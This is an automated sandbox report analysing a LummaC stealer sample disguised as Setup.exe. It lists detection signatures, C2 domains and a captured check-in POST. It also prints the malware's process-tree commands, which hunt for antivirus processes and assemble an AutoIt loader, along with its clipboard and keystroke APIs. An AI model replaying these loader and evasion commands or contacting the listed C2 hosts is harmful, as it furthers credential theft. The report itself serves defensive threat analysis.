Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:	Setup.exe
Analysis ID:	1570754
MD5:	35874e6f90e4b9b6db01d06ddc711f2c
SHA1:	247d4310594364356cb4cc3fb1b3bb15327cdd9c
SHA256:	9c9f34c8f3fd24a4197aac078985edb782bb13dcd7d830130d8a0d41fd49b9f8
Tags:	exeuser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Sample uses string decryption to hide its real strings

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Setup.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 35874E6F90E4B9B6DB01D06DDC711F2C)

cmd.exe (PID: 6600 cmdline: "C:\Windows\System32\cmd.exe" /c copy Were Were.cmd && Were.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6840 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6872 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 6980 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7060 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5480 cmdline: cmd /c md 485687 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 4180 cmdline: findstr /V "ADDITIONALLYPURCHASEDNEWLYLAUNDRYASSISTSHELPLESWRIGHT" Permitted MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 2496 cmdline: cmd /c copy /b ..\College + ..\Shelter + ..\Defects + ..\Populations + ..\Alive + ..\Bus k MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Introduces.com (PID: 3452 cmdline: Introduces.com k MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

choice.exe (PID: 3192 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["formy-spill.biz", "covery-mover.biz", "lumzulyj.shop", "zinc-sneark.biz", "dare-curbys.biz", "dwell-exclaim.biz", "impend-differ.biz", "print-vexer.biz", "se-blurry.biz"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Were Were.cmd && Were.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Were Were.cmd && Were.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6488, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Were Were.cmd && Were.cmd, ProcessId: 6600, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Were Were.cmd && Were.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7060, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T01:38:54.544319+0100	2028371	3	Unknown Traffic	192.168.2.4	49820	104.21.24.90	443	TCP
2024-12-08T01:38:56.908064+0100	2028371	3	Unknown Traffic	192.168.2.4	49826	104.21.24.90	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T01:38:56.501008+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49820	104.21.24.90	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T01:38:56.501008+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49820	104.21.24.90	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://lumzulyj.shop/api	Avira URL Cloud: Label: malware
Source: lumzulyj.shop	Avira URL Cloud: Label: malware
Source: https://lumzulyj.shop/	Avira URL Cloud: Label: malware
Source: https://lumzulyj.shop:443/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["formy-spill.biz", "covery-mover.biz", "lumzulyj.shop", "zinc-sneark.biz", "dare-curbys.biz", "dwell-exclaim.biz", "impend-differ.biz", "print-vexer.biz", "se-blurry.biz"]}

Multi AV Scanner detection for submitted file

Source: Setup.exe	ReversingLabs: Detection: 18%
Source: Setup.exe	Virustotal: Detection: 15%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.9% probability

Sample uses string decryption to hide its real strings

Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: impend-differ.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: print-vexer.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: dare-curbys.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: covery-mover.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: formy-spill.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: dwell-exclaim.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: zinc-sneark.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: se-blurry.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lumzulyj.shop
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: impend-differ.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: print-vexer.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: dare-curbys.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: covery-mover.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: formy-spill.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: dwell-exclaim.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: zinc-sneark.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: se-blurry.biz
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lumzulyj.shop
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000A.00000003.2633026551.0000000001411000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.24.90:443 -> 192.168.2.4:49820 version: TLS 1.2

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A54005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00A54005
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00A5C2FF
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5494A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00A5494A
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_00A5CD9F
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5CD14 FindFirstFileW,FindClose,	10_2_00A5CD14
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00A5F5D8
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00A5F735
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00A5FA36
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A53CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00A53CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\485687	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\485687\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49820 -> 104.21.24.90:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49820 -> 104.21.24.90:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: lumzulyj.shop
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: se-blurry.biz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49826 -> 104.21.24.90:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49820 -> 104.21.24.90:443

Source: global traffic

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lumzulyj.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A629BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

10_2_00A629BA

Source: global traffic	DNS traffic detected: DNS query: tLlYhvSbrTRqhxpzIwTuQjRbuHJm.tLlYhvSbrTRqhxpzIwTuQjRbuHJm
Source: global traffic	DNS traffic detected: DNS query: lumzulyj.shop

Source: unknown

Source: Setup.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Setup.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Setup.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Cardiff.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Cardiff.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Setup.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Setup.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Setup.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: Setup.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Setup.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: Setup.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Cardiff.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Cardiff.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Introduces.com, 0000000A.00000000.1707960081.0000000000AB9000.00000002.00000001.01000000.00000007.sdmp, Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Setup.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Setup.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: Introduces.com, 0000000A.00000002.2692011561.0000000001410000.00000004.00000800.00020000.00000000.sdmp, Introduces.com, 0000000A.00000002.2691661811.0000000001314000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lumzulyj.shop/
Source: Introduces.com, 0000000A.00000002.2691661811.00000000012DD000.00000004.00000020.00020000.00000000.sdmp, Introduces.com, 0000000A.00000002.2691276616.0000000001116000.00000004.00000020.00020000.00000000.sdmp, Introduces.com, 0000000A.00000002.2692011561.0000000001410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lumzulyj.shop/api
Source: Introduces.com, 0000000A.00000002.2691276616.0000000001116000.00000004.00000020.00020000.00000000.sdmp, Introduces.com, 0000000A.00000002.2692011561.0000000001410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lumzulyj.shop:443/api
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Diy.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Setup.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: Introduces.com.1.dr, Cardiff.0.dr, Diy.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Introduces.com, 0000000A.00000003.2650277752.00000000017E1000.00000004.00000800.00020000.00000000.sdmp, Introduces.com.1.dr, Cardiff.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826

Source: unknown

HTTPS traffic detected: 104.21.24.90:443 -> 192.168.2.4:49820 version: TLS 1.2

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A64830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

10_2_00A64830

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A64632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

10_2_00A64632

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A7D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

10_2_00A7D164

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A10E38 CloseHandle,NtProtectVirtualMemory,

10_2_00A10E38

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A542D5: CreateFileW,DeviceIoControl,CloseHandle,

10_2_00A542D5

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A48F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

10_2_00A48F2E

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		0_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A55778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		10_2_00A55778

Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\AsciiCroatia	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\JudgesCognitive	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\StarterConsiderable	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\ShitAndrews	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\OffshoreGuyana	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_009FB020	10_2_009FB020
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_009F94E0	10_2_009F94E0
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_009F9C80	10_2_009F9C80
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A123F5	10_2_00A123F5
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A78400	10_2_00A78400
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A26502	10_2_00A26502
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_009FE6F0	10_2_009FE6F0
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A2265E	10_2_00A2265E
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A1282A	10_2_00A1282A
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A289BF	10_2_00A289BF
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A70A3A	10_2_00A70A3A
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A26A74	10_2_00A26A74
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A00BE0	10_2_00A00BE0
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A4EDB2	10_2_00A4EDB2
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A1CD51	10_2_00A1CD51
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A70EB7	10_2_00A70EB7
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A58E44	10_2_00A58E44
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A26FE6	10_2_00A26FE6
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A133B7	10_2_00A133B7
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A1F409	10_2_00A1F409
